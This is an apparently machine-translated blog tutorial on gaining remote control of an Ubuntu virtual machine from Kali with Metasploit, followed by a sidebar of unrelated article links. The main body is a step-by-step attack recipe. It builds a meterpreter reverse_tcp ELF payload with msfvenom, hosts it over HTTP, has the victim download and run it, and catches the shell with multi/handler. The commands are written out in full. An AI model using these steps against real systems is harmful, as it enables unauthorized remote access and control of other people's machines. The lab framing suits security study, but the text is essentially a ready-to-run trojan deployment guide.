当前位置:网站首页>Using Metasploit Trojan horse for remote control
Using Metasploit Trojan horse for remote control
2022-06-11 06:17:00 【H-feng】
Environmental Science :ubuntun+kali2020.4
This experiment requires two virtual machines kali And ubuntun
notes :kali The address is 192.168.147.137 ubuntun The address for 192.168.147.129
I use ssh link
ssh link ubuntun And enter root jurisdiction 
ssh link kali
stay kali Next root Generated under permission payload( It's a Trojan horse )msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.147.137 LPORT=4444 -f elf > shell.elf Merge into shell.elf Use ls To view the
notes :192.168.147.137 by kali Address 4444 Is the port 
stay kali Use in python mapping
python3 -m http.server 80

Use ubuntun Download wget http://192.168.147.137/shell.elf
stay kali Next msfconsole Next use use exploit/multi/handler command ( Specially used for listening ), And use options View parameters 
Use set Add parameter 
Use set Conduct payload:linux/x86/meterpreter/reverse_tcp LHOST=192.168.147.137
stay msf In the middle of run, And then in ubuntun In the middle of shell.elf You will find that the connection is successful ( If the permission is insufficient, use chmod Promote the authority )
Now you can execute the command If the permission is not enough, you can use shell, Quit using exit

边栏推荐
- What happened to the young man who loved to write code -- approaching the "Yao Guang young man" of Huawei cloud
- C language war "minesweeping"
- The difference between call and apply and bind
- FPGA面试题目笔记(一)——FPGA开发流程、亚稳态和竞争冒险、建立保持时间、异步FIFO深度等
- Servlet
- PHP processing tree and infinite processing
- Shandong University machine learning experiment VI k-means
- Using Internet of things technology to accelerate digital transformation
- Principle of copyonwritearraylist copy on write
- Instanceof and type conversion
猜你喜欢

Pycharm usage experience

Verilog realizes binocular camera image data acquisition and Modelsim simulation, and finally matlab performs image display

Sqli-libs range 23-24 filtration and secondary injection practice

FPGA面试题目笔记(四)—— 序列检测器、跨时钟域中的格雷码、乒乓操作、降低静动态损耗、定点化无损误差、恢复时间和移除时间

Simple understanding of pseudo elements before and after

MATLAB realizes mean filtering and FPGA for comparison, and uses Modelsim waveform simulation

This point of arrow function

Warmly celebrate that yeyanxiu, senior consultant of Longzhi, won the title of "atlassian Certified Expert"

verilog实现双目摄像头图像数据采集并modelsim仿真,最终matlab进行图像显示

FPGA Design -- ping pong operation implementation and Modelsim simulation
随机推荐
The difference between call and apply and bind
Delegation agreement, data source agreement and advanced view in view
Sword finger offer 50: the first character that appears only once
Shandong University machine learning experiment 5 SVM
Do we really need conference headphones?
This is probably the most comprehensive project about Twitter information crawler search on the Chinese Internet
Shandong University machine learning experiment VI k-means
[IOS development interview] operating system learning notes
call和apply和bind的区别
箭头函数的this指向
Analyze the capacity expansion mechanism of ArrayList
What is a planning BOM?
Autojs, read one line, delete one line, and stop scripts other than your own
A multi classification model suitable for discrete value classification -- softmax regression
Record the first data preprocessing process
FPGA interview notes (II) -- synchronous asynchronous D flip-flop, static and dynamic timing analysis, frequency division design, retiming
FPGA interview notes (IV) -- sequence detector, gray code in cross clock domain, ping-pong operation, static and dynamic loss reduction, fixed-point lossless error, recovery time and removal time
CCF 2013 12-4 interesting numbers
Eureka cluster setup
Cocoatouch framework and building application interface